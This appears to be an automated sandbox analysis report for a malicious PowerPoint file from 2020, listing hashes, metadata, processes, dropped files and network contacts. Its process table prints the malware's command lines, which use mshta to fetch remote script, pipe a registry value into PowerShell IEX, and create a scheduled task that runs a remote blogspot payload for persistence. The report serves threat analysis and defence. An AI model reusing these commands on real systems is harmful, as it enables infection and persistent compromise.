File name: | 87ba36cf5356cc4ec3f1.ppt |
Full analysis: | https://app.any.run/tasks/4e662f35-16e2-4fa6-88b3-eea5591df456 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 12:51:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-powerpoint |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Master Mana, Last Saved By: Master Mana, Revision Number: 2, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 01:48, Create Time/Date: Mon Oct 19 23:07:16 2020, Last Saved Time/Date: Mon Oct 19 23:09:05 2020, Number of Words: 0 |
MD5: | 9E696B828A2757012A5AB00C43899730 |
SHA1: | 87BA36CF5356CC4EC3F185452EB04A2F98190B6A |
SHA256: | 496237726CD64B44B246DCD3510CE666E10276FB92EC362B45038DD360BA2C07 |
SSDEEP: | 384:x+VWKu2FCMFrZzmi9i8GZMgChag0RF5koxhmG92t+xclFo39D:lxOCMFrd9o39G6cjo |
.pps/ppt | | | Microsoft PowerPoint document (79.7) |
---|
CompObjUserTypeLen: | 25 |
---|---|
CompObjUserType: | Microsoft Forms 2.0 Form |
Title: | - |
Author: | Master Mana |
LastModifiedBy: | Master Mana |
RevisionNumber: | 2 |
Software: | Microsoft Office PowerPoint |
TotalEditTime: | 1.8 minutes |
CreateDate: | 2020:10:19 22:07:16 |
ModifyDate: | 2020:10:19 22:09:05 |
Words: | - |
ThumbnailClip: | (Binary data 43336 bytes, use -b option to extract) |
CodePage: | Windows Latin 1 (Western European) |
PresentationTarget: | Widescreen |
Bytes: | - |
Paragraphs: | - |
Slides: | - |
Notes: | - |
HiddenSlides: | - |
MMClips: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2616 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\87ba36cf5356cc4ec3f1.ppt" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Exit code: 0 Version: 14.0.6009.1000 | ||||
1376 | mshta https://%3812%3812%3812%3812%[email protected]\asdg786352ghjdgvbsafdghas " | C:\Windows\system32\mshta.exe | POWERPNT.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1968 | powershell ((gp HKCU:\Software).juggga)|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2932 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://madarjaaatresearchers.blogspot.com/p/elevated777.html""\"", 0 : window.close"\") | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2616 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR4153.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2616 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DFB0B2E3121EBEAC35.TMP | — | |
MD5:— | SHA256:— | |||
2616 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DF544BE4C646628656.TMP | — | |
MD5:— | SHA256:— | |||
2616 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DF55856DB53FAAC598.TMP | — | |
MD5:— | SHA256:— | |||
2616 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DFD13403356B76BA0F.TMP | — | |
MD5:— | SHA256:— | |||
1376 | mshta.exe | C:\Users\admin\AppData\Local\Temp\Cab692E.tmp | — | |
MD5:— | SHA256:— | |||
1376 | mshta.exe | C:\Users\admin\AppData\Local\Temp\Tar692F.tmp | — | |
MD5:— | SHA256:— | |||
1376 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B | binary | |
MD5:91C6EF137F655204C9B23BF8E4991FC0 | SHA256:30AC9B58507221B334BED8CE36E59E808DC16C4E24C9C2F5AEC169CBCA3EC09E | |||
1376 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\asdg786352ghjdgvbsafdghas[1].htm | html | |
MD5:8F5A3E071D255F4F77A769CA3EB44A68 | SHA256:635C8DF4CB26B8CE86C0625B703BF0B0C664B56D5B5785FCED48555E8546E4DE | |||
1376 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB | der | |
MD5:F0A02D6514FA6A61CDB9F91DD2215867 | SHA256:74043ECAA233B3F6D6245FF0D6B03AF8370EE1288D84E8CD33D955AE1B925BB1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1376 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D | US | der | 471 b | whitelisted |
1376 | mshta.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY%2Bsl%2Bj4yzQuAcL2oQno5fCgQUUWj%2FkK8CB3U8zNllZGKiErhZcjsCEAt2bSBUjvsrlVzk6sKUDkk%3D | US | der | 471 b | whitelisted |
1376 | mshta.exe | GET | 200 | 216.58.207.35:80 | http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D | US | der | 468 b | whitelisted |
1376 | mshta.exe | GET | 200 | 216.58.207.35:80 | http://ocsp.pki.goog/gts1o1core/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQD0p%2Bg1pVZ3hQgAAAAAWy7e | US | der | 472 b | whitelisted |
1376 | mshta.exe | GET | 200 | 216.58.207.35:80 | http://ocsp.pki.goog/gts1o1core/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEDHHXZM2901mAgAAAAB8NPo%3D | US | der | 471 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1376 | mshta.exe | 172.217.16.201:443 | www.blogger.com | Google Inc. | US | whitelisted |
1376 | mshta.exe | 172.217.21.225:443 | madarjaaatresearchers.blogspot.com | Google Inc. | US | whitelisted |
1376 | mshta.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1376 | mshta.exe | 67.199.248.16:443 | j.mp | Bitly Inc | US | shared |
1968 | powershell.exe | 104.23.98.190:443 | pastebin.com | Cloudflare Inc | US | malicious |
1376 | mshta.exe | 216.58.207.35:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
1376 | mshta.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
j.mp |
| shared |
ocsp.digicert.com |
| whitelisted |
madarjaaatresearchers.blogspot.com |
| whitelisted |
ocsp.pki.goog |
| whitelisted |
www.blogger.com |
| shared |
dns.msftncsi.com |
| shared |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
google.com |
| whitelisted |
pastebin.com |
| shared |